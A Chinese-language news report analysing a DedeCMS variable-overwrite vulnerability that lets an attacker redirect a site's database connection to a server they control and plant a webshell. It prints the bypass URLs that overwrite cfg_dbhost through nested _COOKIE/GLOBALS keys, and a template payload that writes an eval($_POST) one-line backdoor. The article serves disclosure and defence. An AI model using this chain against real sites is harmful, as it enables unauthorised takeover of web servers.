【51CTO.com綜合報道】

事件背景：

近日很多網站被爆遭到入侵，經過安全寶安全實驗室研究分析，這些網站使用的都是DedeCMS內容管理系統，DedeCMS爆出一個很嚴重的漏洞，攻擊者可以直接向服務器中寫入"一句話木馬"。

DedeCMS的漏洞成因主要是由于變量覆蓋導致而成，攻擊者通過通過提交變量，覆蓋數據庫連接配置的全局變量，從而可以使被攻擊的網站反向連接攻擊者指定的數據庫，讀取指定的內容，并在被攻擊的網站中直接寫入WebShell。從整個攻擊過程來看，這種攻擊利用方式也比較巧妙，避開了傳統的注入，破解，登錄后臺和上傳木馬的攻擊模式，攻擊者可以在未授權的前提下直接向網站目錄中寫入WebShell，從而控制網站，危害嚴重。

隨著網站管理員的安全意識的逐漸提高，網絡安全設備的引入，模塊和程序的過濾;傳統的入侵模式也越來越捉襟見肘，從這次攻擊中，我們發現傳統的Web攻擊思想也在發生變換，它們正慢慢由正向攻擊向反向攻擊過渡，其實在系統的攻擊中，反向攻擊早就存在，攻擊者為了繞過防火墻一些列的前端過濾設備，利用木馬使被攻擊機器自己發起連向攻擊者機器的請求，而防火墻通常是不會攔截機器主動發現的連接，從而攻擊者很容易繞過了前端一系列的過濾和障礙。

分析報告：

下面我們一起來看下Dede的漏洞原因，首先我們來看個變量覆蓋漏洞的原型基礎：

VulTest.php:

<?php

$anquanbao="imiyoo_first";

foreach($_GET  as $key=>$value)

$$key=$value;

echo "\$anquanbao=".$anquanbao;

?>

攻擊者顯然通過$_GET提交變量覆蓋已經定義的變量，效果如下圖：

攻擊前圖片

攻擊后圖片($anquanbao變量已經被覆蓋)

有了這個漏洞的基礎，現在我們來看看Dede的漏洞詳細信息,漏洞主要發生在文件/plus/mytag_js.php中：

我們首先讀下這段代碼的處理流程，程序在開始會獲取用戶提交的$aid變量，如果需要顯示不需要顯示緩存內容，則會從數據庫表'#@_mytag'中讀取記錄，并將讀取的$tagbody內容以Dede模版形式寫入緩存文件中。

在這里很顯然存在變量$aid的注入漏洞，但由于該表的內容一般都為空，而且Dede對提交的單引號都會有過濾，基本屬于雞肋漏洞；但是如果結合變量覆蓋漏洞，攻擊者就可以利用該漏洞覆蓋數據庫配置文件的連接信息，將數據庫的連接重定向到攻擊者可以控制的一個數據庫，那么這樣攻擊者就能完全控制$tagbody的內容，而且在DedeCMS文章管理系統中，模版中是可以嵌入PHP代碼，也就是說攻擊者可以執行自己的PHP代碼，從而可以輕易地向服務器中寫入一句話木馬，達到攻擊的效果。

在對漏洞進行測試的時候，我們發現Dede產生變量覆蓋漏洞的代碼在/include/common.inc.php中，如下：

通過這段代碼我們可以對程序中的任何變量進行覆蓋，為了覆蓋數據庫配置文件中的變量，其實我們覆蓋$cfg_dbhost或$GLOBALS[cfg_dbhost]都可以，因此我們可以提交形如下面的測試代碼：

   Ø mytag_js.php?_GET[cfg_dbhost]=www.anquanbao.com

   Ø mytag_js.php?_GET[GLOBALS][cfg_dbhost]= www.anquanbao.com

不過DedeCMS對這種形式的攻擊也是有防范，但只是對提交的變量中的鍵值進行了判斷，代碼如下：

但是這個變量$_k只是對一維數據的鍵值進行判斷，而Dede對變量的提取卻是支持多維的，如果攻擊者提交的是多維的變量就可以很容易繞過，為了繞過正則的檢測，同時達到覆蓋變量的效果;因此我們可以很容易想到$_COOKIE變量，更重要的是Dede也支持$_COOKIE提交變量，因此我們就可以得到如下的有效攻擊代碼： 

Ø mytag_js.php?_GET[_COOKIE][GLOBALS][cfg_dbhost]=www.anquanbao.com

利用上面的代碼就可以繞過DedeCMS的正則檢測，同時可以覆蓋$GLOBALS[cfg_dbhost]變量。

分析總結：

通過對上面的分析，那么現在我們就能很清楚整個攻擊流程：

1 攻擊者會預先準備一個MySQL數據庫，數據庫中包含有一個表明為'#@_mytag'的數據表，其中'#@'是待攻擊數據庫的表前綴，并在表中插入一條記錄來控制$tagbody的內容，使其能夠寫入一句話木馬，而且Dede利用模版寫入一句話木馬的代碼如下:

{dede:php}

$fp = @fopen("test.php", \'a\');

@fwrite($fp, \'<?php eval($_POST[test]) ?>\');

echo "OK";

@fclose($fp);

{/dede:php}

2 提交變量覆蓋語句讀取表中指定的內容，即可在當前路徑下寫入一句話木馬。

鑒于很多使用DedeCMS的網站還沒有修補該漏洞，因此在這里就不公布危害性攻擊代碼。

安全建議:

許多程序員在對$_GET,$_POST或$_COOKIE獲取的變量處理中，進行了對多維數組變量的遞歸解析，但是卻在過濾的時候并沒有對每一維的鍵值進行判斷和檢測；例如，在本次爆出的Dede的0day，程序員就只考慮到檢測二維數組的鍵值，但是攻擊者卻可以通過提交三維數組生成COOKIE變量輕易繞過。因此程序員如果在保證程序能夠對多維變量進行解析的時候，同時也是需要對每一維的鍵值進行有效檢測和判斷。